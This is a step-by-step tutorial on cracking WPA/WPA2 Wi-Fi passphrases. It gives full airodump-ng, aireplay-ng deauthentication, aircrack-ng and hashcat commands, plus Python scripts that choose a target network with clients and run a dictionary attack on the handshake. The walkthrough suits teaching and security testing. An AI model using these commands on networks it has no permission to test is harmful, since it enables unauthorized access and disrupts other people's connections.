Wireless Hacking Aircrack-ng and Hashcat


Date: 11/6/2021

1. INTRODUCTION

aircrack-ng is a widely used suite of tools for analyzing wireless networks. It offers many possibilities, as it is split into several more focused tools (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng itself). To better understand this process, it is recommended that you do some background reading on what WPA/WPA2 is.

Unlike WEP, which can be cracked with statistical attacks that make everything faster, WPA/WPA2-PSK has no known shortcut of that kind: the only practical way to recover the password is to capture the 4-way handshake between a client and the access point and then test candidate passphrases against it offline (a dictionary or brute-force attack).

WPA/WPA2 does not encrypt traffic with the shared key directly. Each session uses fresh keys derived from the pre-shared key, the network name (ESSID), the MAC addresses of both sides and two random nonces, which are exchanged in the 4-way handshake when the client connects. That is why the handshake must be captured: it contains everything needed to check whether a guessed passphrase is the right one. The pre-shared key is a passphrase of 8 to 63 characters, and short or dictionary-based passphrases can be cracked effectively.

The cracking process is extremely slow and needs a lot of processing, because every candidate passphrase has to go through 4096 rounds of PBKDF2-HMAC-SHA1 before it can be checked against the handshake. It is only effective if the real passphrase is actually in the dictionary, and with a large dictionary it can take a very long time.

To make your own wireless network practically unbreakable with this method, use a long random passphrase (for example 20 or more characters mixing letters, digits and special characters): it will not be in any dictionary and is far too long to brute force.

This article will be useful for you to learn some methods of wireless network cracking. Do not use them for malicious purposes; you own your acts!


2. INTERFACE IN MONITOR MODE

From now on, everything should be done with root privileges.

The network card needs to be in monitor mode to identify all the wireless networks around you. In this mode the card listens to every 802.11 frame in the air, not only the ones addressed to it, which is what allows us to capture the WPA/WPA2 4-way handshake.

The process of enabling monitor mode will vary depending on which driver the network card uses.

Running airmon-ng without arguments lists the wireless interfaces together with their driver and chipset.

ifconfig (or ip link) can be used to list the interfaces as well. It is good to have more than one wireless interface, so that one can stay connected while the other is used for the attack; I choose the second one, usually a USB adapter that shows up as wlan1.

Before starting, airmon-ng check kill stops processes such as NetworkManager and wpa_supplicant that would otherwise keep changing the channel or reset the interface. Then the following command starts monitor mode:
$ airmon-ng start wlan1


PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR0000 Wireless Network Adapter (PCI-Express) (rev 01)
phy2    wlan1           ath9k_htc       Qualcomm Atheros Communications AR0000 802.11n
                                        (mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
                                        (mac80211 station mode vif disabled for [phy2]wlan1)
                

Notice that if ifconfig is executed again, the interface now shows up as wlan1mon: the interface name has changed, and wlan1mon is the name to use in all following commands.

Optionally, a channel can be given so that the monitor interface is locked to one channel:
$ airmon-ng start wlan1 10

In this case channel 10. I prefer not to specify one at this stage: airodump-ng hops across all channels by itself while scanning, and the channel is fixed later, once the target is known.


3. DISCOVERING NETWORKS

The next step is to scan with the monitor interface, capturing everything happening on the air around us, so it is possible to discover more about the target than just its ESSID.

airodump-ng is used:
$ airodump-ng wlan1mon


CH 11 ][ Elapsed: 24 s ][ 2021-03-11 14:31

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

00:E0:20:00:00:00  -40       33        9    0  11  130   WPA2 CCMP   PSK  WIFI-1
70:B6:06:00:00:00  -79       28        0    0  10   65   OPN
FC:2E:48:00:00:00  -84       17        8    0  10  540   WPA2 CCMP   PSK  WIFI-2
D8:A6:78:00:00:00  -85       19        0    0   1  130   WPA2 CCMP   PSK  WIFI-3
C0:C9:E3:00:00:00  -85       13        0    0  11  130   WPA2 CCMP   PSK  WIFI-4
5C:9D:7D:00:00:00  -90        5        2    0   6  195   WPA2 CCMP   PSK  WIFI-5
F8:AD:A6:00:00:00  -90        3        0    0   1  195   WPA2 CCMP   PSK  WIFI-6
E4:33:D7:00:00:00  -50       36        3    0  11  130   WPA2 CCMP   PSK  WIFI-7
EF:AD:A6:00:00:00  -92        5        0    0   1  195   OPN              WIFI-8

BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

F4:33:D7:00:00:00  02:F0:20:00:00:00  -43    0 - 1e     0        1
74:33:D7:00:00:00  10:54:BB:00:00:00  -75    0 -24e     0        4
                

Every BSSID has been changed!
The most important columns: BSSID is the MAC address of the access point, PWR its signal level in dBm (closer to 0 is stronger, so -40 is a much better signal than -90), CH its channel, and ENC/CIPHER/AUTH its security (WPA2 CCMP PSK is exactly the case this article attacks; OPN is an open network with no key). The second table lists STATIONs, i.e. clients, and the BSSID they are associated with; a network needs at least one associated client for the deauthentication in the next section to work.


4. CAPTURING HANDSHAKE

The purpose of the next step is to capture the 4-way handshake of the AP we are interested in.

The handshake only happens when a client connects (or reconnects) to the network. We can either wait for that to happen or force it by deauthenticating an already connected client, which is a small denial of service against that client.

The command will be similar to the previous one, but we apply some filters to deal only with the AP we want:
$ airodump-ng -c 10 --bssid FC:2E:48:00:00:00 -w handshake wlan1mon
- -c 10 -> channel used by the wireless network.
- --bssid FC:2E:48:00:00:00 -> access point MAC address; eliminates the other, polluting networks.
- -w handshake -> prefix of the output files; the captured packets, including the handshake, go to handshake-01.cap (airodump-ng appends a counter to the prefix).

The command line interface will look like this:


CH 10 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

FC:2E:48:00:00:00   39 100       51        0    0   10 54  WPA2 CCMP   PSK  WIFI-2

BSSID              STATION            PWR  Lost  Packets  Probes
                    

The packet we want will probably not be captured right away. This may take a while, as we are waiting for a device to connect to the network; when it happens, the notice is shown in the top right corner, next to the date and time:

CH 10 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: FC:2E:48:00:00:00

The next step is optional, because we can simply wait for a connection if we are patient enough. It also requires a client that is already associated with the AP (listed in the lower table of airodump-ng); if there is none, there is nobody to deauthenticate and you have to wait for a device to connect.

This step sends a deauthentication frame to the client, in the name of the AP, telling it that it is no longer associated. The client then reconnects, generating a new 4-way handshake which can be captured.

For this to work, the attacking computer needs to be close enough to the client: the deauthentication frames are sent directly to it, and if it cannot hear them, the attack won't work. It also fails against networks using Protected Management Frames (802.11w, mandatory in WPA3), where unprotected deauthentication frames are simply ignored.

While the previous command is running, open a new terminal and execute:
$ aireplay-ng -0 1 -a FC:2E:48:00:00:00 -c 06:C0:20:00:00:00 wlan1mon
This command deauthenticates just the one specified client. To deauthenticate all clients of the AP at once (a broadcast deauthentication, which is often less reliable because many clients ignore it) the command is:
$ aireplay-ng -0 1 -a FC:2E:48:00:00:00 wlan1mon
- -0 means deauthentication.
- 1 is the number of deauth bursts to send (a few may be needed; 0 means keep sending until interrupted, which also keeps the client from reconnecting, so do not overdo it).
- -a FC:2E:48:00:00:00 is the MAC address of the access point.
- -c 06:C0:20:00:00:00 is the MAC address of the client being deauthenticated.
- wlan1mon is the interface name.

If it works as planned, the client will reconnect and the handshake will be captured. To confirm before spending hours on cracking, run aircrack-ng on the capture file without a wordlist: it lists each network found in the file together with the number of handshakes it contains for that BSSID.
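Picking the target from sections 3 and 4 can be automated from the CSV file that airodump-ng -w writes next to the .cap (handshake-01.csv). The following is an added example, not code from the article or from the aircrack-ng project: it parses that CSV layout (the column order written by airodump-ng 1.6), keeps only WPA/WPA2-PSK networks that actually have an associated client, prefers the strongest one, and prints the two commands used above. The sample CSV is constructed from the (anonymised) scan table above; the client associations in it are made up for the example.

```python
import csv
import io
from dataclasses import dataclass, field


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # e.g. "WPA2", "WPA2 WPA", "WEP", "OPN"
    cipher: str
    auth: str         # "PSK" or "MGT"
    power: int        # dBm, closer to 0 is stronger
    essid: str
    clients: list = field(default_factory=list)   # (station MAC, power)


def parse_airodump_csv(text: str) -> list:
    """Parse the <prefix>-01.csv written by airodump-ng -w <prefix>.

    The file is an access-point table, a blank line, then a station table;
    every value is followed by ", " and a station's BSSID column reads
    "(not associated)" when it is not connected to any AP.
    """
    aps, stations, section = {}, [], None
    for raw in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [f.strip() for f in raw]
        if not row or not row[0]:
            continue                      # blank separator lines
        if row[0] == "BSSID":
            section = "ap"
        elif row[0] == "Station MAC":
            section = "sta"
        elif section == "ap" and len(row) >= 14:
            aps[row[0]] = AccessPoint(row[0], int(row[3]), row[5], row[6],
                                      row[7], int(row[8]), row[13])
        elif section == "sta" and len(row) >= 6:
            stations.append((row[0], int(row[3]), row[5]))
    for mac, power, bssid in stations:
        if bssid in aps:                  # skips "(not associated)"
            aps[bssid].clients.append((mac, power))
    return list(aps.values())


def choose_target(aps: list):
    """A WPA/WPA2-PSK network with at least one associated client, strongest
    signal first. Open networks have nothing to crack, and without a client
    there is nobody to deauthenticate, however strong the signal."""
    candidates = [ap for ap in aps
                  if "WPA" in ap.privacy and ap.auth == "PSK" and ap.clients]
    return max(candidates, key=lambda ap: ap.power, default=None)


def commands_for(ap: AccessPoint, iface="wlan1mon", prefix="handshake") -> list:
    """The two commands from this article, filled in for the chosen AP and its
    best-heard client (the deauth has to reach the client, not just the AP)."""
    client = max(ap.clients, key=lambda c: c[1])[0]
    return [f"airodump-ng -c {ap.channel} --bssid {ap.bssid} -w {prefix} {iface}",
            f"aireplay-ng -0 1 -a {ap.bssid} -c {client} {iface}"]


# Constructed sample in airodump-ng's CSV layout, using the (anonymised)
# networks from the scan above; the client associations are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:E0:20:00:00:00, 2021-03-11 14:31:02, 2021-03-11 14:31:26, 11, 130, WPA2, CCMP, PSK, -40, 33, 9,   0.  0.  0.  0,   6, WIFI-1,
70:B6:06:00:00:00, 2021-03-11 14:31:03, 2021-03-11 14:31:25, 10,  65, OPN ,  ,  , -79, 28, 0,   0.  0.  0.  0,   0, ,
FC:2E:48:00:00:00, 2021-03-11 14:31:02, 2021-03-11 14:31:26, 10, 540, WPA2, CCMP, PSK, -84, 17, 8,   0.  0.  0.  0,   6, WIFI-2,
E4:33:D7:00:00:00, 2021-03-11 14:31:02, 2021-03-11 14:31:26, 11, 130, WPA2, CCMP, PSK, -50, 36, 3,   0.  0.  0.  0,   6, WIFI-7,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
10:54:BB:00:00:00, 2021-03-11 14:31:05, 2021-03-11 14:31:20, -75, 4, FC:2E:48:00:00:00,
02:F0:20:00:00:00, 2021-03-11 14:31:09, 2021-03-11 14:31:09, -43, 1, (not associated), WIFI-7,
"""

if __name__ == "__main__":
    target = choose_target(parse_airodump_csv(SAMPLE_CSV))
    print(f"target: {target.essid} ({target.bssid}) on channel {target.channel}")
    print("\n".join(commands_for(target)))
```

With the sample above, WIFI-1 has the best signal but no client, so the chooser falls back to WIFI-2, the only PSK network with someone to deauthenticate; the probing client that is not associated with any AP is ignored. Run it against a real handshake-01.csv by reading the file into parse_airodump_csv instead of SAMPLE_CSV.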


5. CRACKING THE KEY

Cracking the WPA/WPA2 password can be done with aircrack-ng. A wordlist is needed; aircrack-ng tests every passphrase in it against the captured handshake.

aircrack-ng does not ship a wordlist of its own. A common list such as rockyou.txt can be used, or John the Ripper can generate candidates (for example by applying its mangling rules to a base list) and pipe them into aircrack-ng, which reads the list from standard input when a dash is given as the wordlist; see the aircrack-ng wiki page listed in the references.

To start cracking, open another terminal window and type:
$ aircrack-ng -b FC:2E:48:00:00:00 -w /path/to/the/wordlist.txt handshake-01.cap
- -b -> BSSID of the target network (the capture may contain more than one).
- -w -> password list.
- *.cap -> file containing the captured packets (handshake-01.cap, as written by airodump-ng above).

The output when the key is found looks like this:


                                 Aircrack-ng 0.8
 
 
                        [00:00:00 ] 2 keys tested (37.20 k/s)
     
     
                             KEY FOUND!  [ 12345678 ]
     
     
        Master Key     : CD 69 0D 11 8E AC CC C5 C5 EC BB 59 85 7D 49 3E 
                         B8 A6 13 C5 4A 94 82 38 ED C3 7E 2C 59 5E AB FD 
     
        Transient Key  : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                         CE 8A 9D AD FC ED A6 DE 70 34 BA 90 83 7E CD 40 
                         FF 1D 41 E1 65 17 93 EE 64 32 BF 25 50 D5 4A 5E 
                         2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
     
        EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
                    


6. CRACKING WITH HASHCAT

hashcat takes WPA/WPA2 handshakes in its ".hccapx" format (hash mode 2500), so the ".cap" file has to be converted first. cap2hccapx from hashcat-utils does the conversion:
$ ./cap2hccapx handshake-01.cap capture.hccapx
"capture.hccapx" is the output file.

And start to crack:
$ hashcat -m 2500 capture.hccapx /path/to/the/wordlist.txt

Current hashcat versions (6.0 and later) deprecate mode 2500 in favour of mode 22000, which takes the ".hc22000" format produced by hcxpcapngtool (from hcxtools) instead of cap2hccapx; the hashcat wiki page in the references documents that path. Either way hashcat performs the same computation as aircrack-ng, but on the GPU, which is far faster.
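What aircrack-ng and hashcat actually do for every dictionary entry, and why sections 1 and 5 call it slow, is easier to see in code. The following is an added example, not code from the article, aircrack-ng or hashcat: it implements the WPA2-PSK check itself (PBKDF2 to the PMK, PRF-512 to the PTK, MIC over EAPOL message 2) and runs a tiny dictionary attack against it. Because no capture file is available here, the handshake is constructed: the article's anonymised AP and client MACs, made-up nonces, and an EAPOL-Key message 2 forged with the article's recovered key 12345678. The PMK test for passphrase "password" on SSID "IEEE" is the published IEEE 802.11i vector.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass

# Byte offset of the MIC inside a complete EAPOL-Key frame: 4-byte EAPOL header,
# then descriptor type(1), key info(2), key length(2), replay counter(8),
# nonce(32), IV(16), RSC(8), key ID(8).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8
MIC_LEN = 16


@dataclass
class Handshake:
    essid: str
    ap_mac: bytes     # authenticator address, 6 bytes
    sta_mac: bytes    # supplicant address, 6 bytes
    anonce: bytes     # 32 bytes, sent by the AP in message 1 (repeated in 3)
    snonce: bytes     # 32 bytes, sent by the client in message 2
    eapol: bytes      # the complete EAPOL-Key message 2 (message 4 also works)
    mic: bytes        # the MIC that frame carries


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    32 output bytes take two SHA-1 blocks, so this is 8192 HMAC-SHA1 calls per
    candidate: the step that makes WPA cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PRF-512 from IEEE 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK that authenticates the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed. The key
    descriptor version (low 3 bits of Key Information) selects HMAC-MD5
    (1, WPA/TKIP) or HMAC-SHA1 truncated to 128 bits (2, WPA2/CCMP)."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    digest = {1: hashlib.md5, 2: hashlib.sha1}[version]   # 3 (AES-CMAC, 802.11w) not handled
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def candidate_matches(passphrase: str, hs: Handshake) -> bool:
    """One dictionary entry, checked the way aircrack-ng and hashcat check it."""
    if not 8 <= len(passphrase) <= 63:        # WPA-PSK passphrases are 8..63 chars,
        return False                          # so anything else is skipped unchecked
    pmk = pmk_from_passphrase(passphrase, hs.essid)
    kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic)


def crack(hs: Handshake, wordlist):
    """Dictionary attack: the first passphrase whose MIC matches, or None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if candidate_matches(word, hs):
            return word
    return None


def build_message2(essid, ap_mac, sta_mac, anonce, snonce, passphrase) -> Handshake:
    """Constructed test data: forge the client's EAPOL-Key message 2 for a known
    passphrase, so the cracker has a genuine MIC to verify against.
    Key Information 0x010a = descriptor version 2 | Pairwise | MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK
    body = (b"\x02" + struct.pack(">HHQ", 0x010a, 16, 1) + snonce + bytes(16)
            + bytes(8) + bytes(8) + bytes(MIC_LEN)
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    eapol = b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, essid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return Handshake(essid, ap_mac, sta_mac, anonce, snonce, eapol, mic)


# Constructed sample: the article's (anonymised) AP and client, made-up nonces,
# and the passphrase the article recovers.
SAMPLE = build_message2("WIFI-2", bytes.fromhex("FC2E48000000"),
                        bytes.fromhex("06C020000000"),
                        bytes(range(32)), bytes(range(32, 64)), "12345678")

if __name__ == "__main__":
    print("KEY FOUND!", crack(SAMPLE, ["password", "qwerty123", "12345678"]))
```

Each candidate costs 8192 HMAC-SHA1 calls for the PMK plus four for the PTK and one for the MIC, and nothing from one candidate can be reused for the next; that, not the MIC comparison, is the whole cost of WPA cracking, and it is what the GPU modes of hashcat parallelise. The cost also explains the advice in section 1: a 20-character random passphrase is simply out of reach for any dictionary or brute-force run at this price per guess.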


7. CONCLUSION

In conclusion, this whole process shows how the password of your home or business network can be broken, and why it is important to stay aware and choose a strong passphrase. Aircrack-ng contains a classic set of tools; used conscientiously, they help make security testing more productive and efficient.


8. REFERENCES

https://www.aircrack-ng.org/doku.php?id=cracking_wpa

https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2

The End